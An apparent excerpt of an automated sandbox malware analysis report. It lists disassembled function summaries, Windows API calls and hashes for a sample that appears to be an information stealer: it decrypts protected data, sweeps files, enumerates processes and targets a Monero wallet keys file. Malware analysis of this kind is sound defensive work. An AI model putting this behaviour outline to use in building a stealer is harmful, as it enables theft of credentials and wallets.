                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0ug$K]w$QKw$YKw$k}kX$k}kX$sw
                                    • API String ID: 0-2124562420
                                    • Opcode ID: e769f482bfc800fbe53c7e76a644fbfe5a02b7d3cdb6269ae0e3fa6f5abef805
                                    • Instruction ID: 4def30583ec74039a98745f5d85000f9b90ced707eb875ef33ccc09cabb09dcc
                                    • Opcode Fuzzy Hash: e769f482bfc800fbe53c7e76a644fbfe5a02b7d3cdb6269ae0e3fa6f5abef805
                                    • Instruction Fuzzy Hash: D8B228F3608200AFE3046E2DEC8567ABBE9EFD4720F16893DE6C4C3744EA7558458697
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01000D73), ref: 00FEE4A2
                                    • StrCmpCA.SHLWAPI(?,010014F8), ref: 00FEE4F2
                                    • StrCmpCA.SHLWAPI(?,010014FC), ref: 00FEE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 1e3d1191bbb8145890f2206d758eddadf6a2c09296674b97f2c7904e4d365983
                                    • Instruction ID: fa9598afbf8b0e25ac0a59bd8f507104247ac0a2dc6215d6c4358d4fcaf4394c
                                    • Opcode Fuzzy Hash: 1e3d1191bbb8145890f2206d758eddadf6a2c09296674b97f2c7904e4d365983
                                    • Instruction Fuzzy Hash: EF1263B290011C9ADB24FB60DC96EFD7338AF54340F4041A9B60E961A5EF786F49DF92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D}w$H{yS$Tu~:$c_}$p1)n$fu
                                    • API String ID: 0-2308427907
                                    • Opcode ID: 104cf95ae210a9ffd288cad9f6d1a007be4a5ba1270017f06b98a05cd6055c7e
                                    • Instruction ID: 17f799724e9c5f7e138af8e215d51c8cf2f0ffb491c4ec391cf4ae773f58e72b
                                    • Opcode Fuzzy Hash: 104cf95ae210a9ffd288cad9f6d1a007be4a5ba1270017f06b98a05cd6055c7e
                                    • Instruction Fuzzy Hash: E0B218F360C2049FE308AE2DEC8567AB7E9EBD4720F1A4A3DE6C5C3744E93558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %WK$eEy$eEy$nrd?$u]9m$lW}
                                    • API String ID: 0-2403466954
                                    • Opcode ID: 59a9f4b427b452986b97afefb67e256e3333040f893e2d8982ffcaa581d6e29d
                                    • Instruction ID: c32bfa993eca8f9e823aed512897e94e78a6fe68e41ddf9bc1e1a141c4e6f29c
                                    • Opcode Fuzzy Hash: 59a9f4b427b452986b97afefb67e256e3333040f893e2d8982ffcaa581d6e29d
                                    • Instruction Fuzzy Hash: 02B20AF3A082109FE304AE2DDC8567AF7E9EF94720F16853DEAC4D7744EA3598058693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~>$ $M_w$Q_w$ZjWK
                                    • API String ID: 0-928244799
                                    • Opcode ID: 7a2dd42c8e3f28a0e488ca65a7e9ffc386e472542ad42725fea2187637395fea
                                    • Instruction ID: e3e4aca864a94e0b10f82454e0aad7f67d2888d250fd245e8c8cf82c2c9390d0
                                    • Opcode Fuzzy Hash: 7a2dd42c8e3f28a0e488ca65a7e9ffc386e472542ad42725fea2187637395fea
                                    • Instruction Fuzzy Hash: F4B2F3F390C2009FE304AF2DEC8567ABBE5EF94760F1A492DEAC597340EA3558418797
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FEC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FEC87C
                                    • lstrcat.KERNEL32(?,01000B46), ref: 00FEC943
                                    • lstrcat.KERNEL32(?,01000B47), ref: 00FEC957
                                    • lstrcat.KERNEL32(?,01000B4E), ref: 00FEC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: f4c82bd2f01822df53a593c4ad3aec4ee6b3be1c3a7ad23523fa4dc1f4be08c3
                                    • Instruction ID: 6ba9eb964b5ad8ffb1cf8a8622c1be086973b0707b4392e4173cfad5414decdb
                                    • Opcode Fuzzy Hash: f4c82bd2f01822df53a593c4ad3aec4ee6b3be1c3a7ad23523fa4dc1f4be08c3
                                    • Instruction Fuzzy Hash: 22415C7590420AAFDB20CFA0DC89BFEBBB8BB44344F1041A8F509A7285D7745A85DF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FE724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FE7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FE72A4
                                    • LocalFree.KERNEL32(?), ref: 00FE72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: b8d46c22f1fe32e2f066cb7b839484ea61f74baabcefbb4a6c9067b752adc40d
                                    • Instruction ID: a8469e8d4fce69c09af71cfd3c314c9f3fd330f67df85e7d9c702d35f8c86855
                                    • Opcode Fuzzy Hash: b8d46c22f1fe32e2f066cb7b839484ea61f74baabcefbb4a6c9067b752adc40d
                                    • Instruction Fuzzy Hash: C6010CB5A40208BBEB24DF94DD4AF9E77B8AB44B00F104155FB05AB6C4D6B0AA008B65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF961E
                                    • Process32First.KERNEL32(01000ACA,00000128), ref: 00FF9632
                                    • Process32Next.KERNEL32(01000ACA,00000128), ref: 00FF9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00FF965C
                                    • CloseHandle.KERNEL32(01000ACA), ref: 00FF967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 718cf7804dc9240a9e4ef68fd41deb820ea73754af46242d39d3ed2854211129
                                    • Instruction ID: d666c858e2ee05c77bff0d735c42d8e40832bb491dfc7a840b0ade96c33586e6
                                    • Opcode Fuzzy Hash: 718cf7804dc9240a9e4ef68fd41deb820ea73754af46242d39d3ed2854211129
                                    • Instruction Fuzzy Hash: 5D01E975A04208ABCB24DFA5D958BEDB7F8AF48310F104198EA06E7640DBB49A44DF51
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010005B7), ref: 00FF86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00FF86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00FF86F3
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • CloseHandle.KERNEL32(?), ref: 00FF8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 4211160bf69f0c78807a003b0f27da81739c7c6d8264b547c99da0603ba2073b
                                    • Instruction ID: 546a2531f2c7bdf2f1b53127d6ffb3c5840643da6374d8022d2eb48b822db28a
                                    • Opcode Fuzzy Hash: 4211160bf69f0c78807a003b0f27da81739c7c6d8264b547c99da0603ba2073b
                                    • Instruction Fuzzy Hash: 8D316BB290121CABCB24EF50DC45FEEB778EF44740F1041A9F20EA66A0DB746A45DFA1
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00FE5184,40000001,00000000,00000000,?,00FE5184), ref: 00FF8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: e86ca749f31a03cb5a4a58d486fa894e2105e7b6875311973779cd9a8f389602
                                    • Instruction ID: 806260c6da5324d2ebb83a9a9d26060d68376389ebf16d7491288499bbc6859e
                                    • Opcode Fuzzy Hash: e86ca749f31a03cb5a4a58d486fa894e2105e7b6875311973779cd9a8f389602
                                    • Instruction Fuzzy Hash: 69111C71200208BFDF10CFA4E889FBB33A9AF89750F109448FA158B650DB75EC42EB60
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 3f4d1c226cdbe60ff46aa6c98ab278a1847d743c2a4e510ce8175c71231b2945
                                    • Instruction ID: f163a0e71ece57a72913ebf318a96b5938446a7d34376647467a8c06c4cef003
                                    • Opcode Fuzzy Hash: 3f4d1c226cdbe60ff46aa6c98ab278a1847d743c2a4e510ce8175c71231b2945
                                    • Instruction Fuzzy Hash: 8A11A4B4640208BFEB10CF64D895FAA77B5FB89710F208058FA159F384C7B5AA41DB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01000E00,00000000,?), ref: 00FF79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,01000E00,00000000,?), ref: 00FF79C4
                                    • wsprintfA.USER32 ref: 00FF79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: bd839b23afc163a9e54ddb8821657f266971cdf99408c196002fce945fa11a6e
                                    • Instruction ID: 1f479ed6bde6e72260484f094fe6937bdb60abd2864b753ffaf15fc3f243e697
                                    • Opcode Fuzzy Hash: bd839b23afc163a9e54ddb8821657f266971cdf99408c196002fce945fa11a6e
                                    • Instruction Fuzzy Hash: F81130B2904118ABCB24DFC9E949FBEB7F8FB4CB11F10411AF605A2684D7795940D771
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0180E2F0,00000000,?,01000E10,00000000,?,00000000,00000000), ref: 00FF7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0180E2F0,00000000,?,01000E10,00000000,?,00000000,00000000,?), ref: 00FF7A7D
                                    • wsprintfA.USER32 ref: 00FF7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 33d42b54024e4ce784574e67c36925fe59b04000604bf2c7089e1cc68598e7b5
                                    • Instruction ID: a903564c40836081a153a3a97c8782103d6704f8b9856def94304681179da816
                                    • Opcode Fuzzy Hash: 33d42b54024e4ce784574e67c36925fe59b04000604bf2c7089e1cc68598e7b5
                                    • Instruction Fuzzy Hash: 8A118EB1945218EBEB209F54EC49FA9B778FB44721F10439AFA0A936D0D7745A40CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "q_$78}$^R?J
                                    • API String ID: 0-4154499154
                                    • Opcode ID: d1b82606fd9dabf45d67702924e4b5e38a9c5d0f43a6e54eb579dc87b6f2ca40
                                    • Instruction ID: e33a004373122c426988b2c76541357ff37125e40fe1c8e7bc7cb9f123924dcc
                                    • Opcode Fuzzy Hash: d1b82606fd9dabf45d67702924e4b5e38a9c5d0f43a6e54eb579dc87b6f2ca40
                                    • Instruction Fuzzy Hash: C9B204F360C204AFE3046F2DEC8567ABBE9EF94320F1A493DE6C5C7744EA3558418696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3/j$8Ha~$:1_
                                    • API String ID: 0-489423431
                                    • Opcode ID: 240664dd73a539e034a3ff868b69cf676314376ada6ac15479a6de1dea245a3f
                                    • Instruction ID: f74cd0d8e2850eb6f2983fecc045d6f2506802e6af940953ddf1ae8f4b504adb
                                    • Opcode Fuzzy Hash: 240664dd73a539e034a3ff868b69cf676314376ada6ac15479a6de1dea245a3f
                                    • Instruction Fuzzy Hash: 96524AF360C2049FE7086E2DEC9577ABBD5EF94260F1A4A3DEAC5C3744E97598008693
                                    APIs
                                    • CoCreateInstance.COMBASE(00FFE118,00000000,00000001,00FFE108,00000000), ref: 00FF3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FF37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: fde8c8fc9334a582a4a6f005358f8e7f6a52a17ca476ac01d950fa435ead91b5
                                    • Instruction ID: 51942c2f6f1c043262820412c0c55d1b7e64dbd0fbd9a219b6c6fda71ed97981
                                    • Opcode Fuzzy Hash: fde8c8fc9334a582a4a6f005358f8e7f6a52a17ca476ac01d950fa435ead91b5
                                    • Instruction Fuzzy Hash: 6B41F971A00A1CAFDB24DF58CC95BABB7B4BF48702F4051D8E609A72A0D775AE85CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FE9BA3
                                    • LocalFree.KERNEL32(?), ref: 00FE9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 52979d9fc29d65bf67456c1da9a6f63e3ce5e532be75ddb9040dfbedfb404492
                                    • Instruction ID: e870fb8dbb28b82f4d1cf59d6ffb1aa0b6c438c35609869d3401d65e453ef21f
                                    • Opcode Fuzzy Hash: 52979d9fc29d65bf67456c1da9a6f63e3ce5e532be75ddb9040dfbedfb404492
                                    • Instruction Fuzzy Hash: 14110CB8A00209EFCB14DF94D989AAE77B5FF88300F104568E81597344D774AE50CF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Psh$X]:
                                    • API String ID: 0-786825503
                                    • Opcode ID: 09863524944303c242584eeba4964f936c3c86054196d0ed42b9da290e40678c
                                    • Instruction ID: 4b66278655c2e3e37ea10537615e4f2a318598fb7b95218baba5e7b61755323a
                                    • Opcode Fuzzy Hash: 09863524944303c242584eeba4964f936c3c86054196d0ed42b9da290e40678c
                                    • Instruction Fuzzy Hash: CDB23BF3A082109FD300AE2DEC8567ABBE9EF94720F1A463DEAC4D7744E67558058793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: h*$o.s&
                                    • API String ID: 0-1761243478
                                    • Opcode ID: 409ac80282adb6ddf5d86a00b01b5106a1d59799972b29a3e3dac122be3beaf3
                                    • Instruction ID: ad40b85e114f6b6341e939a525bbd779092b40b8cecc007f1e6189d2ae4a83ce
                                    • Opcode Fuzzy Hash: 409ac80282adb6ddf5d86a00b01b5106a1d59799972b29a3e3dac122be3beaf3
                                    • Instruction Fuzzy Hash: DEB2F8F360C2049FE304AE2DEC4567AB7E9EF94720F1A893DE6C4C7744E63598058697
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010015B8,01000D96), ref: 00FEF71E
                                    • StrCmpCA.SHLWAPI(?,010015BC), ref: 00FEF76F
                                    • StrCmpCA.SHLWAPI(?,010015C0), ref: 00FEF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FEFAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: a5fab3822850ce9dcba98df2f2988bcc247c180a572608d86250647d202ab0da
                                    • Instruction ID: 68e00fbbd2aba64aa5972e8a194fa1c746d8363eb56ea696b719333cec26c54b
                                    • Opcode Fuzzy Hash: a5fab3822850ce9dcba98df2f2988bcc247c180a572608d86250647d202ab0da
                                    • Instruction Fuzzy Hash: 031187B580014DABDB24FB60DC559FD7378AF10340F4082A9A61E575E2EF742B4AD792
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8b558f626a1c08cd308e72fb5498bb603b4bcd14f31e28718f679a208c60b64
                                    • Instruction ID: b60f9ff5ce466d6622981f79025f0a7f8fdafb39625c06392e18cee40094196f
                                    • Opcode Fuzzy Hash: a8b558f626a1c08cd308e72fb5498bb603b4bcd14f31e28718f679a208c60b64
                                    • Instruction Fuzzy Hash: D6D1A0F3A0C200AFE3046F19EC8176AF7E9EF94720F1A892DE6C4C3744E63598518796
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
